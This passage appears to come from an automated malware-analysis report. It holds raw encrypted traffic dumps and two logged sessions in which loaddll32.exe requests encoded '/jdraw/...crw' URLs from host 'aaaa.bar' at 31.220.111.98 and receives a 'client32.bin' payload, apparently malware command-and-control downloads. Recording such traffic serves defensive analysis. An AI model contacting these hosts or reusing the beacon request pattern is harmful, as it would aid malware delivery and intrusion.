                                                              2021-10-20 13:12:07 UTC593INData Raw: 2e 4a 31 ca f3 2b be 89 95 34 73 d7 cb 0c 35 50 c4 f1 24 68 8b 88 fc e3 a7 a4 41 86 f8 78 72 ba 2c 90 c1 e3 b3 fd cc d2 05 5c b3 e9 df 42 3a 66 1d 3d 9c 30 db dc 67 7b ab 0a 63 9e 99 3a e3 34 02 9b e3 c3 2a 8e 7b 0a 0e d6 b3 13 54 08 d7 62 5c c8 8a f5 3f 45 1a 48 f9 ef 9c 14 54 a6 b4 3d 2e 56 59 e6 16 5b 29 3c 7b 64 d9 3f 07 fa 80 0a 6a b7 ba 82 65 f6 e2 03 5c 3f 54 5c a2 73 0f 30 1a 81 cf 8b e6 ab e2 01 73 0f 1e 18 75 ad 97 26 cb 15 de 15 d6 48 cb 51 79 8f 3f 63 7b 8f f1 92 43 f0 4f 57 de 6c 4e ad b8 1f f6 47 b9 a2 d8 bc 92 4a 95 19 03 62 3c 8d 67 62 d1 80 db d2 f7 06 37 5c 0f 39 52 04 32 b5 99 20 0e ee 13 87 8f c5 e1 15 23 87 6f d4 a4 3f ae fc ef 14 81 fd fb 27 56 6a a0 df 16 76 77 a2 ca c9 af bc ab 64 2a 89 5d 62 98 bf bb 00 02 3f e2 68 b0 35 6a ef 7e
                                                              Data Ascii: .J1+4s5P$hAxr,\B:f=0g{c:4*{Tb\?EHT=.VY[)<{d?je\?T\s0su&HQy?c{COWlNGJb<gb7\9R2 #o?'Vjvwd*]b?h5j~
                                                              2021-10-20 13:12:07 UTC609INData Raw: 1b c5 c1 52 5d e8 1b 9f 71 ab 0e 0b 8a 06 41 d0 4e b2 cb 38 c5 78 ca 47 e5 5b 37 6b 00 6a a2 3b 43 82 0b 40 3b 9b d6 a7 5c ba 97 be 1f e7 ee af 71 bb 24 48 79 84 77 57 bc ab 4e bb f7 97 e6 e1 0d 53 9e f0 14 bf 31 5d 58 05 68 f2 a0 17 71 1c ad 45 3f ae c8 bc a5 aa 93 eb ba c8 a7 67 ac 5c eb d9 b1 07 eb 5f 17 c0 18 44 0c f2 3d e5 81 b3 8a 93 07 8c a4 fa 37 bc 6f 4c a1 a0 6e 28 50 74 08 0f 4a 51 66 bb b7 f9 2f 6e 3c 71 74 ff d7 8c 9e b5 56 56 9c a7 22 d5 d7 29 76 b5 2e e9 c9 bb bc 74 89 5e 8b 63 a9 b2 5f 63 13 02 9c 34 83 60 13 85 42 2e a4 07 d3 64 e0 bf ec b0 74 b5 5d 30 8f 37 aa b8 eb b6 97 ef d8 c1 41 32 84 02 bf c5 59 16 51 c4 c9 d5 e2 66 32 ef 4b ab 59 9e 90 a0 d8 db c6 fb 78 77 d3 df b2 65 22 a3 66 bb 19 18 43 48 26 2f b4 dc 7b 68 0d 6e 34 d8 2b d0 43
                                                              Data Ascii: R]qAN8xG[7kj;C@;\q$HywWNS1]XhqE?g\_D=7oLn(PtJQf/n<qtVV")v.t^c_c4`B.dt]07A2YQf2KYxwe"fCH&/{hn4+C
                                                              2021-10-20 13:12:07 UTC641INData Raw: 5f 7a 9f 35 09 63 55 53 bb 4b 41 13 f0 91 f8 0a 07 60 7b f7 55 83 b4 a5 17 86 71 27 6b 8d 18 72 f9 43 15 c2 61 8b 60 90 27 e9 c9 13 a2 a0 63 2f 4d 2a 03 5a 41 7f 9f ab 65 f3 69 ce 1b 35 41 db 34 ea eb d6 9d 9f 13 e8 da 77 03 6a d8 e8 da 4f 0b 2b 13 51 a4 96 a7 47 32 59 77 45 0e b9 1f 3f 73 be 78 a0 8b a6 2d 08 2a 52 36 5b 9d ee c1 d3 49 99 23 d5 5b a7 75 83 e2 18 23 e6 f1 ea 0d 54 aa 2d c6 ee 57 34 e5 fb 67 f2 4b 03 93 72 06 90 b3 b6 3e 4b 0d a4 7f 44 69 e4 dc 3f 91 e0 72 6e 51 e4 59 b9 2d 88 6f 71 75 62 c4 aa f8 c6 f9 3f f1 7f cc f0 29 ea 89 7c 41 40 97 26 1c d1 5a 80 46 a4 7e fd 7b 04 0b 75 65 21 25 9a 05 08 e6 80 cc 1a 48 15 cc c7 14 c2 d7 ab bb 00 83 16 00 d3 4e 21 b2 50 29 94 10 54 24 aa c8 23 81 b3 16 c0 fd de fd 17 01 de 7a 04 d1 0f d1 52 69 97 78
                                                              Data Ascii: _z5cUSKA`{Uq'krCa`'c/M*ZAei5A4wjO+QG2YwE?sx-*R6[I#[u#T-W4gKr>KDi?rnQY-oqub?)|A@&ZF~{ue!%HN!P)T$#zRix
                                                              2021-10-20 13:12:07 UTC705INData Raw: f6 dc b3 15 4c d1 14 b8 eb 59 b9 e1 37 08 b7 e2 48 73 d3 5f 58 44 83 57 60 8a b5 ba 46 dd e5 13 b4 4b 9f fa b9 3b 16 57 c6 74 ba b7 ca ae da 55 18 25 a9 61 16 1d 54 de c6 0e 93 ad 72 af 8f 01 7f 9e e5 c2 30 ce 18 65 e9 8d 33 23 21 dd 90 99 be 5a 86 38 60 0a 64 5e c0 3c 9b 98 4a c1 8a ae e6 0b 47 ee 0b ba db c2 e3 cc 1e f2 82 cf 91 7a 59 09 fb 82 ef d3 2c 94 20 0d b3 b6 8e fe fd 12 23 d6 25 d3 1e 4c 5e f8 72 51 3b 5a 5c 95 64 a0 88 22 56 ba 5f d3 14 e8 00 66 ea fb 4f 45 b5 4e 9b 57 cf 89 c4 4e a6 c4 0f dd 04 48 55 f2 4d 05 24 24 c3 51 8a b9 48 c7 c6 d8 f6 c9 af f1 de eb 65 ff 4b 63 c3 ea a4 5d 7b 34 40 46 9d 9a 1f be f2 e5 78 ae 49 25 7f 4a 1c 95 15 02 ba 5f ad 1f 2e 56 d5 e7 19 6f de 86 4e d2 7b 7a de 6d f8 e7 dc 57 f5 23 81 91 3e ab 9d df bf 74 84 26 4b
                                                              Data Ascii: LY7Hs_XDW`FK;WtU%aTr0e3#!Z8`d^<JGzY, #%L^rQ;Z\d"V_fOENWNHUM$$QHeKc]{4@FxI%J_.VoN{zmW#>t&K
                                                              2021-10-20 13:12:08 UTC768INData Raw: 20 bc 07 a2 70 0c ba 65 28 80 61 ab 01 b1 81 37 31 09 a2 a1 66 5c 85 4e 97 ed 5b 95 a8 9f 75 75 3d 68 61 73 f3 9a 62 84 80 1b 83 41 4d a0 6a 3c 97 8b d3 01 45 8e 7d cf 25 76 f8 60 d6 85 04 29 da f2 2a 6a f3 5c 61 19 53 6a e0 54 b4 c8 d0 3d ec b1 f6 a8 41 70 ee a4 81 45 ae cb e4 f8 8e 6b 38 06 eb 05 dd ba 7a af f5 35 93 6b 7d c7 2c 71 20 21 07 81 ac 0b 8d 58 e3 6b 10 c6 50 0f 13 ad a6 a1 48 72 94 7d dd ce 69 16 50 6f 88 bb 55 6f 6c 31 8b ed e7 4b ea a0 cf 38 71 e4 0c f9 89 79 21 01 d8 34 b9 1e 5e 00 38 24 6b ea be e2 59 48 44 b1 52 cd b1 4b f0 70 a9 f8 5e 59 be b8 eb c3 7f 82 9c 9a ff 12 47 93 09 c4 42 ba 07 90 86 13 79 cd e1 4f f3 2c cf e3 13 d4 63 f4 a7 c6 57 a3 a5 9b 80 40 43 ce 8d 9b eb 6e bd f6 db 92 35 b5 45 df 08 5a f2 df 84 f0 c2 9c 93 80 35 01 c8
                                                              Data Ascii: pe(a71f\N[uu=hasbAMj<E}%v`)*j\aSjT=ApEk8z5k},q !XkPHr}iPoUol1K8qy!4^8$kYHDRKp^YGByO,cW@Cn5EZ5
                                                              2021-10-20 13:12:08 UTC784INData Raw: 3b 57 ae 94 64 e1 a2 2f 21 c8 68 fe 83 e9 c0 cc a5 b4 7d ed a7 76 49 ee 30 ac 0d 6b 83 8d 7e 8c ee f8 05 a7 b8 0d 28 e8 9f 3a fb 0b 38 bd fc e6 f8 a1 f9 86 52 ed 92 14 e5 a5 bb 73 24 43 0c 32 6b e9 a3 3e 89 f9 40 7e 69 90 4b b7 6a bf 9b fa 8c e4 ad 3a 20 45 36 5a 03 e0 ff 57 aa de 5d 27 4d 6d f8 a4 95 ae 49 02 c3 28 03 59 cd e3 fc e9 10 ac 2e 39 9c 64 22 3e 5a c2 81 57 11 29 68 0c 61 51 2f dd c5 b5 77 8f 31 ac 3c 48 aa 79 78 74 63 5c da a6 49 bc d2 39 01 f1 0f bb c2 f6 2a 5f 28 b1 0d 45 ca e9 dd 2c 23 c9 61 c2 45 e8 64 1d 29 cb b1 f7 70 c4 6d 0b 74 3d 1a 6f 20 e9 67 f2 6c 6a 67 15 27 d6 86 19 bf d1 31 31 15 ca c2 e1 0d 22 f6 cd 34 a4 87 47 81 23 7c 06 aa db 60 22 7b 5d 59 df 70 e6 8f 80 70 c9 d4 2e 2f 22 98 bb ad 88 cb b3 3b b0 11 09 ab 1a f3 75 16 9d 3b
                                                              Data Ascii: ;Wd/!h}vI0k~(:8Rs$C2k>@~iKj: E6ZW]'MmI(Y.9d">ZW)haQ/w1<Hyxtc\I9*_(E,#aEd)pmt=o gljg'11"4G#|`"{]Ypp./";u;
                                                              2021-10-20 13:12:08 UTC801INData Raw: f4 45 5b 10 5c 2d 4f 1a 90 46 e3 a0 a3 5d 2e e4 27 e6 81 b2 37 f3 fe f5 c0 cb e2 5a 0c 85 c8 56 8d 72 ef 1d 40 1f bd 5e 9f e2 2c 58 0d ce 81 8d 68 22 f1 3e be b1 ce 56 8e 96 ed 7f cb 93 2f c6 da 16 3f 14 29 1e 69 9f ec 31 e0 23 9a 44 94 ef 4b d8 d0 c1 08 99 69 29 c8 2a 18 90 5d 29 c6 d0 cf 66 66 b7 01 05 60 0b 83 1a 6d f9 a0 1d a2 2d 4d a8 5e fc 38 c5 9e 05 82 09 de 00 4f b7 73 ea fb 72 8c cf 67 11 83 58 16 68 e5 c9 91 0f c6 ab 3c ca b1 6f a4 bf 65 e6 a9 54 f6 5c e5 52 58 a3 47 c0 29 a5 02 3c 26 7e 71 87 43 db e8 e3 12 c2 56 f4 e8 c1 a2 78 c5 10 65 40 9f cb f9 f8 c9 72 03 b4 6e 95 83 be c1 6e 77 9d 2a 24 bb 73 49 27 db 0a 07 10 9c 66 19 ba ea 00 22 f3 19 53 e4 a1 e4 9f 83 db a8 a6 ea 07 ec 20 6f 87 4f c8 0a 75 cc cc e6 2d fd 2d de 8a 1a 29 f7 1e 23 9e 84
                                                              Data Ascii: E[\-OF].'7ZVr@^,Xh">V/?)i1#DKi)*])ff`m-M^8OsrgXh<oeT\RXG)<&~qCVxe@rnnw*$sI'f"S oOu--)#
                                                              2021-10-20 13:12:08 UTC817INData Raw: b0 34 69 ae f2 ed 91 62 cf 4c f2 04 e4 81 46 be 40 88 33 ea 12 7f 56 54 38 6e db 40 6d 51 a2 77 ae 02 c6 38 fe 95 2b 17 d7 46 6d 99 c8 3d a7 24 23 10 19 04 2e 3f b8 3d 3c 61 b3 75 82 a1 db 73 32 a3 ba 8c 74 19 28 b4 61 32 ce 18 c2 a7 b8 29 64 f0 59 ea 32 6e 80 1c e4 08 95 08 11 60 54 47 4f 6e a4 5c 7e 63 6d 92 07 c8 8d 02 05 b3 5f 8e 4d dd 31 80 60 af 08 f7 83 2a 1c 25 60 d0 f5 0d dc 79 5d 9d f6 32 fa 40 07 f0 0d a6 f3 a4 7c 6e 95 c0 37 0f b2 f6 fd 4c a0 42 ea 19 f4 58 ae dd 23 9b f7 bb d5 6f 0c 63 d1 92 98 60 b3 c4 66 10 04 d9 51 49 7c 5e 2a 52 89 d4 a2 1a ee db f4 56 d6 53 c7 b3 05 c1 44 71 f4 45 8a b0 67 98 7d 76 d2 c0 e9 48 78 c3 e4 75 71 8b 47 b9 c0 41 8a 1c 15 d7 33 95 c1 46 41 8d 8f bd b8 6b 7c 5d 0b 00 3c fb f4 92 c9 be 97 92 fc 29 98 dc 54 40 51
                                                              Data Ascii: 4ibLF@3VT8n@mQw8+Fm=$#.?=<aus2t(a2)dY2n`TGOn\~cm_M1`*%`y]2@|n7LBX#oc`fQI|^*RVSDqEg}vHxuqGA3FAk|]<)T@Q
                                                              2021-10-20 13:12:08 UTC833INData Raw: a6 7e c3 d7 27 38 80 6d 49 5d ad 80 7b 43 c3 fc 9a 87 9f 53 3a b7 14 15 97 8a 69 87 72 bc 3c a7 88 1e 34 ff 0e d6 ba 8e 0f 5d 42 b0 9a d6 48 bf 3d 19 e5 d6 3e 7b 3b 5f 5e b8 5d 9f a4 ac b0 8e a3 bb e9 89 1e 98 f2 24 ce 4f d6 42 b4 09 c7 14 65 d4 28 df 25 8d fd 27 a5 fc 9a 08 3c 41 73 ca 7e 2c b9 b3 10 20 d0 50 ad 19 1f 23 a0 13 9c 55 b8 30 b4 ed e3 06 18 78 7c 56 12 8e 4d dd 81 ab 9f 21 dc b1 8a 1e aa 8d 1b d5 4b e4 66 9c c8 fc 23 e2 16 65 0f 60 75 d1 21 8f 15 4e 4c 9f ef 63 22 84 4b 27 19 d0 65 1c ff c0 40 8f 76 82 c9 84 e6 0c 61 f7 d3 32 8a 48 e6 f8 d6 8c 63 4a 68 b4 7b 5e bd f8 69 f6 a9 61 13 bf 1a 14 4d 37 04 c2 f8 f3 78 71 1f 87 78 1c ed ae 8f 85 45 7e a4 e4 9f 1d be 25 ea 73 b0 1c 81 9b ee 91 31 b2 97 03 2f 7c b8 3e 09 86 68 f0 fe 0c 26 42 85 4a 1a
                                                              Data Ascii: ~'8mI]{CS:ir<4]BH=>{;_^]$OBe(%'<As~, P#U0x|VM!Kf#e`u!NLc"K'e@va2HcJh{^iaM7xqxE~%s1/|>h&BJ
                                                              2021-10-20 13:12:08 UTC851INData Raw: ad e0 d1 12 29 22 49 f9 a7 34 97 6f 16 37 a2 81 a9 13 85 99 88 2d b8 18 ed ea 94 02 b8 22 70 88 0c 4e 0e 1b 00 37 07 5d 64 37 f1 6a 4c 38 7a f2 3a 1b 46 ef 40 57 8c e1 17 93 3c a3 4b 92 85 6a 10 e7 3f 00 44 98 2b c3 fa ee 7f 6b 37 fb da 91 35 cf 6a 80 66 60 87 9f 24 9d 96 42 04 c0 b3 9a 33 cc 61 ca 16 f3 ed e7 ea a7 3a 20 0f e8 34 ed 80 fe f9 c1 74 5d e2 f9 4a 63 04 d3 49 a0 05 0a f8 4a d1 0a 90 61 6a 78 cd d8 d0 bd e8 5d 41 37 ce 31 6a 1a 93 62 b6 40 78 c3 39 a0 e3 b5 1d 16 c7 a4 52 64 c1 a1 86 59 17 c6 04 73 90 dc 81 c5 b8 85 f8 c8 87 c0 a5 92 a0 ed 29 c2 60 be 4c e0 e9 2e 7b 3f fd 5b 0f a7 d8 d8 2b 82 e3 60 b6 29 35 2b 35 eb de 6d d5 5b 09 af 1e 19 62 3c c6 34 06 bb 37 e1 4c c6 d5 6a 0c e7 7e d4 bc 17 02 40 74 1f 2d 3c fc d2 07 5e 59 fc 92 9e d4 c9 59
                                                              Data Ascii: )"I4o7-"pN7]d7jL8z:F@W<Kj?D+k75jf`$B3a: 4t]JcIJajx]A71jb@x9RdYs)`L.{?[+`)5+5m[b<47Lj~@t-<^YY
                                                              2021-10-20 13:12:08 UTC867INData Raw: 1d 15 22 2b 66 85 73 55 9e f6 5d a8 ee ce a7 ad e3 06 87 85 cc aa 6b f2 42 fd 2e 71 66 12 47 8e 4f 20 98 f2 f2 2f c8 e4 86 04 6d 89 5a 47 41 b4 c5 b3 2c b5 72 11 ed ba 4a 11 d8 c5 78 7a 07 5e 3a 35 5b 79 1b ea f0 cd 1c 51 ca d6 3f 7c 2a 83 33 78 ea f8 a1 d2 53 56 01 d8 bc f0 70 e3 c7 56 d1 49 7c 69 88 45 fd 9e f8 75 51 b3 6b 86 60 ec 24 61 d5 01 53 f6 dd 5f d0 fc 4a c2 a4 a7 9a e1 19 6e 91 30 ef 70 fc 6b 93 3c 90 c8 f6 19 fc a6 ce fc 4e 06 d6 48 8f d3 2d 9d 12 97 9d 2e cb d0 0f ee c6 9c 88 05 10 81 d9 1b 82 d6 24 26 e5 f9 81 16 d7 c4 21 f4 8d 80 59 6e 21 72 a1 30 24 dc 56 eb 1e c2 33 72 fe 43 94 d6 f7 89 b8 f9 c0 bd e3 2a fb 80 da 0f a1 ff 1d 43 89 84 1a b5 ef f5 db bc e9 79 91 d6 80 6d 40 24 9f 96 b2 01 78 4a 45 bf 58 84 4b 5e 45 41 b6 5b 47 0d e4 3b e4
                                                              Data Ascii: "+fsU]kB.qfGO /mZGA,rJxz^:5[yQ?|*3xSVpVI|iEuQk`$aS_Jn0pk<NH-.$&!Yn!r0$V3rC*Cym@$xJEXK^EA[G;
                                                              2021-10-20 13:12:09 UTC883INData Raw: 2e fb d7 0d cb 00 dd e6 64 4f 12 08 ca b5 65 15 ea dd 61 cf 59 a0 04 52 6d 3a 86 4a 5c 6f 3c 6c 28 15 af b6 d0 89 01 51 da 89 16 c7 3c 79 9b 77 68 ca cd 8c 91 5e f7 6f 51 58 f6 11 eb 66 c3 96 07 b5 3c 1f 26 a5 27 0a 26 66 13 20 26 1e ed 1f 1e 48 82 7f 31 c3 3e 11 2e 36 52 61 d9 12 a3 8a 5b d8 ad 2e eb c4 f5 02 a5 f3 57 48 23 3e e2 49 bc 1c 72 e8 1d 42 34 84 0c e4 4b 29 19 0d 98 88 d1 f8 85 30 f5 bc 13 32 3e d8 76 cb 37 60 de ac 31 9d bc c1 16 d8 ea 49 2d d5 70 d8 18 86 1a c3 e6 5c b3 d0 15 54 d4 a9 76 e7 43 90 50 a7 09 85 d6 8b 54 00 3d d6 c1 cd 33 e9 99 9b 62 8d 0b 61 48 63 fd 51 68 59 24 9e e2 b2 37 dd ce 4a 4e ba 5e 02 84 db 7f 49 bd a1 c0 de 66 e3 69 a4 1f 2a 0c 67 99 85 fb 24 98 b2 ab 69 af 8e 8c 62 79 8c 0c 4b d4 5d 7a 2f 03 f4 f8 ac 01 36 31 ab 4a
                                                              Data Ascii: .dOeaYRm:J\o<l(Q<ywh^oQXf<&'&f &H1>.6Ra[.WH#>IrB4K)02>v7`1I-p\TvCPT=3baHcQhY$7JN^Ifi*g$ibyK]z/61J
                                                              2021-10-20 13:12:09 UTC899INData Raw: 9a fa 62 32 5e b9 ab 85 b9 ab 50 c2 4a 8f c4 09 06 ae d5 bc 3a f3 8f f0 af d1 30 0b 9a cf 47 a5 60 5a 9d a6 b3 f3 db df 96 f0 20 0d a5 af d2 f4 64 bd 31 f5 be 5d f3 c5 fa 96 bb b3 a5 6d de cc 0b f5 bf 50 97 43 de 4f 1a 6d 46 32 20 ed 70 40 f0 8e 52 f1 9b a7 17 20 51 75 c9 52 f0 df 6f 73 c6 07 1d 2a 25 36 cb 2a 6f 45 b8 56 ed 01 4a f2 36 7a e4 02 b6 48 2f 27 9c 06 4a 19 1f 1d 07 33 7c 4d d9 28 2c 7d 74 84 5c 11 7c 58 97 9d 6a ab dd eb d2 6c d9 06 63 cc 3e 4a da c1 53 67 47 fc ef 52 94 5a 60 47 3b a9 3c 3b 31 a2 8e 39 86 a6 02 7d 89 e6 27 f4 64 49 f4 28 0e 30 dc 0c 71 0c 45 b0 da 9e ea 87 8e 11 ac 2c 22 ca 4e 8d 3f ae 3f 71 19 52 29 a0 82 9e 3b eb db c6 1e bf e9 4e b1 8b 87 d5 1f 14 a3 8a 84 41 34 77 05 fa 28 d8 dd ef 95 86 ec 0f 8d cb 65 0c f0 72 f7 2a fa
                                                              Data Ascii: b2^PJ:0G`Z d1]mPCOmF2 p@R QuRos*%6*oEVJ6zH/'J3|M(,}t\|Xjlc>JSgGRZ`G;<;19}'dI(0qE,"N??qR);NA4w(er*


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
14 | 192.168.2.5 | 49962 | 31.220.111.98 | 443 | C:\Windows\System32\loaddll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-20 13:12:08 UTC | 800 | OUT | GET /jdraw/VsEIWZ_2Fbo/VS2aUL2DPkksBz/_2BbHmaiMGFq8k7sf_2FK/_2BE4M1ccGRR2cER/_2ByL6dRggF3y7v/VMJcRRP5R6TojvxFTX/kOSl73q2F/w8Q6acp8KbUFCwTOVCqa/KHPQFw1IxW8ntmCw6R5/_2FriFMvRAS7jKjzJNgjI_/2B3Jlm1ZTjVZL/7f9n_2Fm/j0A3VF_2BTXTJlyVXccf7gs/IMfn4fjHWd/I3IboiX_2F3/uQt3.crw HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: aaaa.bar
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: PHPSESSID=al703vnk3gvkbspp3p283jhcg4; lang=en
2021-10-20 13:12:08 UTC | 849 | IN | HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Wed, 20 Oct 2021 13:12:07 GMT
Content-Type: application/zip
Content-Length: 1849
Connection: close
X-Powered-By: PHP/5.4.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
Content-Transfer-Encoding: Binary
Content-Disposition: attachment; filename=client32.bin
                                                              2021-10-20 13:12:08 UTC849INData Raw: 22 1f 12 32 d8 c6 ba 35 1b ff 2a a8 1c 15 83 72 b3 16 30 ce 8b f2 94 08 32 b5 de 35 dc 20 3e ac 5d 96 4d c1 42 3b eb 46 b9 92 bf 30 9f d0 97 f7 68 13 8c 4f ec d3 8c 98 37 3b 38 0c 51 23 b9 f0 b7 b7 68 ff 4b ce a9 e2 e3 0a fb e3 28 6e 38 b4 86 ed 03 1a b9 b3 8d e3 35 69 c2 0f bd f8 60 4a 2a ba b5 be 77 d8 2c 7e 54 ea b0 d2 c4 21 2c 2f 64 67 78 04 20 fb f5 b4 13 84 8f 93 92 a9 da b7 b0 d8 c4 f3 26 b2 9b 6b d4 41 a2 c0 2c 65 66 7d 01 c0 92 8f 3e be 38 e1 5d 3b d7 0f a8 6f 1f 17 e3 68 76 c4 94 df 75 68 dc cf b3 96 d9 68 a9 37 d4 9e 63 ee b1 03 af 8a 98 78 93 81 67 51 05 29 ae f7 06 1d 8d 12 90 f1 82 ea b8 3a bb 3b 1a 73 ab 17 ff bb 0a ba a1 e4 5b 0f 0d b8 1e 90 30 67 3c 7b 7f 44 09 be 0b ee fd 94 d7 8d fb 6a e7 6f b3 40 4c 70 ab fe 15 b8 b5 c7 e8 0d 01 1a 59
                                                              Data Ascii: "25*r025 >]MB;F0hO7;8Q#hK(n85i`J*w,~T!,/dgx &kA,ef}>8];ohvuhh7cxgQ):;s[0g<{Djo@LpY


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
15 | 192.168.2.5 | 49963 | 31.220.111.98 | 443 | C:\Windows\System32\loaddll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-20 13:12:08 UTC | 849 | OUT | GET /jdraw/yQNRXOou_2F/TKb_2FDPLUxEHX/34UsINmRGrF0U0brjExsG/R8lvAy6e3bs7Nh2H/QoLe_2Bwp2v2e8Z/IwuiqSnSaPWQnudhme/0fUiRiwnK/HC2m5rShJXeZnaMhBAa7/2sv1pUExc23tcG4uzbe/S9YqUCaVHHJSHD_2FHBasu/DOlWi2P1fW4xM/vPgP1tY3/PB1yvdHjP2kNFl0vG_2Fhxc/khv1QiPG/3tnR7uH.crw HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: aaaa.bar
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: lang=en
2021-10-20 13:12:09 UTC | 914 | IN | HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Wed, 20 Oct 2021 13:12:08 GMT
Content-Type: application/zip
Content-Length: 178758
Connection: close
X-Powered-By: PHP/5.4.16
Set-Cookie: PHPSESSID=h4s0ka612qu3hrcshs8hb4ig95; path=/; domain=.aaaa.bar
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
Content-Transfer-Encoding: Binary
Content-Disposition: attachment; filename=client32.bin
                                                              2021-10-20 13:12:09 UTC915INData Raw: 48 09 14 d8 bf b2 ec 04 c8 3f fb 4a d3 80 06 f0 bd 59 db e6 a5 dc 23 c3 c4 68 50 2b c5 72 6b 51 b9 b6 5d f6 b0 8c e5 6c 92 cd 4f eb 84 b9 2a 59 c3 36 e1 e6 ff 74 17 e2 17 9f 76 48 e1 10 c3 10 20 de 74 a3 61 05 3d 18 af ac d1 94 a7 dc dc 5f f5 ba 05 9e 73 7e 12 fb c3 d6 e6 b3 38 19 98 c6 03 29 3f e2 e7 9e 10 4f f5 6c 76 05 ad a2 46 50 82 ef cd d6 8c 0e b7 d4 7a 83 0b da 2d 3f 56 17 a1 34 c0 54 e5 30 ea 5b 21 4d d8 8f 21 be 07 db 0b 89 d7 cf 77 3b 02 38 71 1c 1f 9b 78 8e 6f 9b b0 e6 1c 94 9b b3 54 21 79 3e 7e 33 82 21 be 10 b5 61 81 24 d9 8a 08 f5 e7 50 bd 70 de 91 53 e6 73 d6 c6 19 5e 05 39 ca aa 07 24 5b aa 6c 8c 1d 89 d8 40 d1 82 e6 df 9e 85 6d c2 2a f3 5b 6b a5 60 05 cd cf 4f 2c bf c1 14 5d d9 66 4e 14 99 c2 6a 73 24 a6 b0 d9 6e 5b 0c a9 73 a8 5e db 86
                                                              Data Ascii: H?JY#hP+rkQ]lO*Y6tvH ta=_s~8)?OlvFPz-?V4T0[!M!w;8qxoT!y>~3!a$PpSs^9$[l@m*[k`O,]fNjs$n[s^
                                                              2021-10-20 13:12:09 UTC930INData Raw: 9d 93 c7 ee a4 f6 76 97 81 b0 53 2e b9 4a d2 2e 0e d1 f0 42 c8 99 45 c3 4f 1b 82 3a 6c 44 b1 d0 4e 60 68 0f ca aa 59 27 0d 82 44 0f 0e d8 6c a5 f2 5a 2b 34 51 0c 9e c0 fe 2b 71 00 27 20 0e 37 af 8d a3 95 5f 9b 29 c9 d8 35 b8 2a 66 d5 20 3a 90 9c 22 7b b6 ab 88 6e 32 bd 60 33 05 b1 67 f0 a8 e4 ca 6d 9d 0e db 05 ea 8c cc aa 2a b6 75 21 e3 ac 76 51 cd be e0 2d d9 17 8b f7 c2 2d a6 66 e0 ad f0 fe d4 f9 06 9d 93 f2 9f e0 ab 3b 40 70 f7 be 38 ab b5 b6 ee f6 ee 83 bf 4c 8e d3 35 32 fd e9 f1 8d 4d ac 91 22 ad 48 0d 4e 9f 67 4d 93 75 8c 40 39 88 5f 8f c3 b6 ae c1 b3 77 07 58 4a 8e 45 b8 47 ae 5c de 2b ed eb 0d 10 0f ba a7 6a 62 62 23 12 29 2e 35 bb bc 51 44 0b ef 76 63 8f e0 b2 0f bc 50 7e 3e cb 02 20 8c 8d 42 4b 38 46 53 8e 6d f4 f8 e2 95 21 09 75 23 20 5f af b7
                                                              Data Ascii: vS.J.BEO:lDN`hY'DlZ+4Q+q' 7_)5*f :"{n2`3gm*u!vQ--f;@p8L52M"HNgMu@9_wXJEG\+jbb#).5QDvcP~> BK8FSm!u# _
                                                              2021-10-20 13:12:09 UTC946INData Raw: 3e b5 30 97 fa 16 ce dc da ed f8 bb 1c b3 d7 33 42 62 26 04 50 c9 ae a2 8a d7 0c bd 59 fa 3d b7 94 9e e8 25 4b 9b 40 be 76 e8 3a ad 03 7f 12 a2 78 80 35 36 16 85 39 d8 c9 f0 3c 10 35 d3 2b 07 8d 44 02 38 bc e6 85 7c e7 8b b7 25 8b 79 c8 7a ee ee 1b cc 72 06 c8 2a e0 17 a1 c7 c5 41 68 75 09 b1 c5 32 0b 5e 03 01 f6 3b cc 77 07 e5 6f 4d 51 1b 95 cb 1d 16 30 1a 06 c1 a5 cd 08 a1 b6 f6 26 4e ba f8 a2 49 2c 1c 43 76 d1 a5 c5 47 99 6e 05 bd a7 1e c6 e6 03 94 f4 ad be 58 f1 71 89 43 63 13 8a 1e 32 e4 a8 18 93 ef 2e ba df ab e9 4a d2 fa d6 04 09 ea c4 5f 8b 7f 3d 5b 34 da 69 e0 c2 25 12 36 56 84 e8 0d c5 0c da eb 25 6e 41 a4 06 88 94 49 21 bb ee c0 23 70 60 51 b2 1c 2a 91 f0 36 d2 dc 76 ff c1 98 7d db 35 a6 03 f4 49 15 d9 c4 81 fd f6 5f 7d 0f 67 9e d1 54 05 f8 7f
                                                              Data Ascii: >03Bb&PY=%K@v:x569<5+D8|%yzr*Ahu2^;woMQ0&NI,CvGnXqCc2.J_=[4i%6V%nAI!#p`Q*6v}5I_}gT
                                                              2021-10-20 13:12:09 UTC963INData Raw: 50 1e 0b ac 4a ce ee 01 c3 32 96 1b bd 04 f7 0a c8 3b 88 1e e6 d3 b0 de 5c b7 76 9f 20 66 82 13 55 7a 3e 5c cb 79 14 ab 5c fa 96 18 e5 67 d2 19 90 78 9f ee 30 8c f1 3f 2e d6 ec ba 9a 6b f8 da 05 d4 37 52 8b a3 0a 1a 19 05 0a e7 5a 88 00 8b 2a 36 08 41 f9 1b e9 97 d2 26 0c 97 de f7 ed c6 73 ab d5 8a 06 ef 27 be 0a 4e c3 0a e9 be 5a 6f ac a9 19 20 98 07 51 2b 13 07 36 be 09 b9 b7 41 1a 66 56 b6 b1 3a ac 8f cb 62 3b fa 4f 63 78 a8 29 6c 69 cf 83 6b a1 a1 d5 9f 98 f7 51 83 7c c3 25 cb 56 a3 1a ed 3c 71 bf 38 00 08 af db ca ee f7 a8 d4 e4 9d 6a c1 40 23 50 7b 4c 57 46 6b c0 32 7e c6 7f ed 56 ba 66 2f 2a cb e1 7e b2 be 9e 61 5c ec 0c f3 b4 44 15 72 4b 72 d5 74 52 32 24 1b 01 72 73 3a 2d cc 39 53 67 ce c3 46 2f b5 04 d2 76 50 fc 1f 74 13 2b 4b bf 91 37 05 27 c4
